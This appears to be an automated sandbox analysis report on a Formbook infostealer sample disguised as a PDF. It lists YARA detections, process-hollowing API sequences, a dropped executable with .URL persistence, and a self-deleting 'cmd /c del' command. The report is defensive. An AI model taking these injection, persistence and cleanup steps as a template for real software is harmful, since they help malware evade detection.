Source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.0.Wkklnmcz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0.0.DOC209272621615.PDF.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 10.2.Wkklnmcz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.DOC209272621615.PDF.exe.2686268.2.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DOC209272621615.PDF.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 6.2.Wkklnmcz.exe.2666268.1.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0.0.DOC209272621615.PDF.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.DOC209272621615.PDF.exe.2686268.5.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 6.2.Wkklnmcz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 6.0.Wkklnmcz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.Wkklnmcz.exe.2746268.1.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DOC209272621615.PDF.exe.2686268.1.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.DOC209272621615.PDF.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Contacts\zcmnlkkW.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\Contacts\Wkklnmcz.exe, type: DROPPED Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
One or more processes crash
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 2132
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_010F9910
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9540 NtReadFile,LdrInitializeThunk, 7_2_010F9540
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F99A0 NtCreateSection,LdrInitializeThunk, 7_2_010F99A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F95D0 NtClose,LdrInitializeThunk, 7_2_010F95D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9840 NtDelayExecution,LdrInitializeThunk, 7_2_010F9840
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_010F9860
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F98F0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_010F98F0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9710 NtQueryInformationToken,LdrInitializeThunk, 7_2_010F9710
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9780 NtMapViewOfSection,LdrInitializeThunk, 7_2_010F9780
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_010F97A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9FE0 NtCreateMutant,LdrInitializeThunk, 7_2_010F9FE0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9A00 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_010F9A00
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9A20 NtResumeThread,LdrInitializeThunk, 7_2_010F9A20
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9A50 NtCreateFile,LdrInitializeThunk, 7_2_010F9A50
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_010F9660
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_010F96E0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9520 NtWaitForSingleObject, 7_2_010F9520
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010FAD30 NtSetContextThread, 7_2_010FAD30
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9950 NtQueueApcThread, 7_2_010F9950
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9560 NtWriteFile, 7_2_010F9560
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F99D0 NtCreateProcessEx, 7_2_010F99D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F95F0 NtQueryInformationFile, 7_2_010F95F0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9820 NtEnumerateKey, 7_2_010F9820
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010FB040 NtSuspendThread, 7_2_010FB040
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F98A0 NtWriteVirtualMemory, 7_2_010F98A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9B00 NtSetValueKey, 7_2_010F9B00
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010FA710 NtOpenProcessToken, 7_2_010FA710
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9730 NtQueryVirtualMemory, 7_2_010F9730
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9760 NtOpenProcess, 7_2_010F9760
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9770 NtSetInformationFile, 7_2_010F9770
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010FA770 NtOpenThread, 7_2_010FA770
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010FA3B0 NtGetContextThread, 7_2_010FA3B0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9A10 NtQuerySection, 7_2_010F9A10
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9610 NtEnumerateValueKey, 7_2_010F9610
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9650 NtQueryValueKey, 7_2_010F9650
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9670 NtQueryInformationProcess, 7_2_010F9670
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F9A80 NtOpenDirectoryObject, 7_2_010F9A80
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F96D0 NtCreateKey, 7_2_010F96D0
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_0359CB3C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 10_2_0359CB3C
PE file contains strange resources
Source: DOC209272621615.PDF.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Wkklnmcz.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Contacts\Wkklnmcz.exe Section loaded: amsiproxy.dll
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: 72480000 page execute and read and write
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: 72480000 page no access
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: 72480000 page read and write
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: 72481000 page read and write
Sample is known by Antivirus
Source: DOC209272621615.PDF.exe ReversingLabs: Detection: 33%
Sample reads its own file content
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe File read: C:\Users\user\Desktop\DOC209272621615.PDF.exe
Reads software policies
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown Process created: C:\Users\user\Desktop\DOC209272621615.PDF.exe "C:\Users\user\Desktop\DOC209272621615.PDF.exe"
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 2132
Source: unknown Process created: C:\Users\user\Contacts\Wkklnmcz.exe "C:\Users\user\Contacts\Wkklnmcz.exe"
Source: C:\Users\user\Contacts\Wkklnmcz.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Contacts\Wkklnmcz.exe "C:\Users\user\Contacts\Wkklnmcz.exe"
Source: C:\Users\user\Contacts\Wkklnmcz.exe Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\logagent.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mobsync.exe Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Uses an in-process (OLE) Automation server Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Creates files inside the user directory Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Wkklnmczcyrsyafzucgflytssyuynbb[1] Jump to behavior
Creates temporary files Show sources
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2119.tmp Jump to behavior
Classification label Show sources
Source: classification engine Classification label: mal100.troj.evad.winEXE@17/11@23/18
Contains functionality to check free disk space Show sources
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00408F92 GetDiskFreeSpaceA, 6_2_00408F92
Contains functionality for error logging Show sources
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00426B6C GetLastError,FormatMessageA, 6_2_00426B6C
Parts of this application are using Borland Delphi (Probably coded in Delphi) Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Runs a DLL by calling functions Show sources
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Creates mutexes Show sources
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5616
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_01
Contains functionality to load and extract PE file embedded resources Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0041A3B4 FindResourceA, 0_2_0041A3B4
Reads the hosts file Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Found graphical window changes (likely an installer) Show sources
Source: Window Recorder Window detected: More than 3 window changes detected
Binary contains paths to debug symbols Show sources
Source: Binary string: cryptbase.pdbt source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: WWAHost.pdb source: mobsync.exe, 0000000C.00000002.462120401.0000000005040000.00000040.00020000.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwinmm.pdb source: WerFault.exe, 00000005.00000002.328390174.00000000009E2000.00000004.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: mobsync.exe, 0000000C.00000002.462120401.0000000005040000.00000040.00020000.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp, logagent.exe, 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.461547697.0000000004CBF000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.460534090.0000000004BA0000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.816777544.0000000004690000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.817065918.00000000047AF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461781268.0000000003BBF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461510475.0000000003AA0000.00000040.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp, logagent.exe, logagent.exe, 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp, logagent.exe, 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.461547697.0000000004CBF000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.460534090.0000000004BA0000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.816777544.0000000004690000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.817065918.00000000047AF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461781268.0000000003BBF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461510475.0000000003AA0000.00000040.00000001.sdmp
